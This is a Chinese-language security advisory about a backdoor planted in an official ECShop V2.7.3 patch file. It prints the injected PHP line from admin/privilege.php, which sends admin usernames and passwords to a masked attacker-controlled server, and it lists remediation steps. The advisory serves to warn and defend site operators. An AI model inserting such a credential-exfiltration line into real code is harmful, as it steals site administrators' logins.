ECShop是很多站長(zhǎng)喜歡用的網(wǎng)店程序，其V2.7.3版本用戶甚眾。

2013年5月，SCANV網(wǎng)站安全中心曾經(jīng)響應(yīng)過ECShop網(wǎng)店程序的后門事件，本以為此事已了，不料在近日，又有安全研究人員在漏洞平臺(tái)Wooyun上發(fā)現(xiàn)了ECShop官方補(bǔ)丁的后門代碼。

經(jīng)SCANV網(wǎng)站安全研究人員分析發(fā)現(xiàn)，這一次的后門代碼存在于一個(gè)編號(hào)為273utf8_patch006的歷史補(bǔ)丁文件包中。駭客將補(bǔ)丁包里的(\admin\privilege.php)文件篡改后，插入了一段記錄后臺(tái)用戶及密碼等信息的代碼，并發(fā)送到一個(gè)由黑客控制的服務(wù)器上。值得注意的是，SCANV安全研究人員在分析前兩次補(bǔ)丁后門代碼里并沒有發(fā)現(xiàn)本次的后門代碼，因此，本次后門事件可能發(fā)生在前兩次篡改之前。

本次駭客植入的后門代碼：

文件\admin\privilege.php代碼113-114行：

@file_get_contents('http://[馬賽

克]/api/manyou/ECShop/w2.php?username='.$_POST['username'].'&password='.$_POST['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);

通過進(jìn)一步分析發(fā)現(xiàn)“http://[馬賽克]/”網(wǎng)站實(shí)際是被黑客入侵控制的網(wǎng)站(“肉雞”)，而且黑客用來(lái)收集密碼等信息的文件目錄還可以“歷遍文件”，如圖：

 #p#

經(jīng)過SCANV網(wǎng)站安全研究人員的下載并去重，發(fā)現(xiàn)大概有90個(gè)域名網(wǎng)站受影響。列表如下：

SCANV網(wǎng)站安全研究中心推薦的解決方案：

1、使用ecshoop的站長(zhǎng)朋友，核對(duì)上面公布的域名，并查看文件\admin\privilege.php內(nèi)容，搜索關(guān)鍵詞“w2.php”。如果找到上面提到的惡意代碼，請(qǐng)直接刪除后保存。

2、修改所有擁有后臺(tái)權(quán)限的用戶的密碼，并通知網(wǎng)站所有用戶修改密碼。

3、復(fù)查網(wǎng)站及服務(wù)器的安全狀況。

目前，官方已在6月3日發(fā)布新的補(bǔ)丁包

(http://bbs.ECShop.com/thread-1130889-1-1.html)，請(qǐng)站長(zhǎng)及時(shí)檢查修復(fù)。

SCANV網(wǎng)站安全中心在此提醒廣大站長(zhǎng)，為自己Web程序下載補(bǔ)丁文件時(shí)一定要做相應(yīng)的檢查，哪怕該補(bǔ)丁文件是從官方網(wǎng)站上下載的，也有可能感染惡意后門。正在使用該網(wǎng)店程序的站長(zhǎng)可登錄：http://www.scanv.com/tools/#ECShop給自己的ECShop站點(diǎn)做個(gè)安全檢測(cè)，平時(shí)可經(jīng)常登錄SCANV網(wǎng)站安全中心，以便第一時(shí)間了解自己網(wǎng)站的安全情況。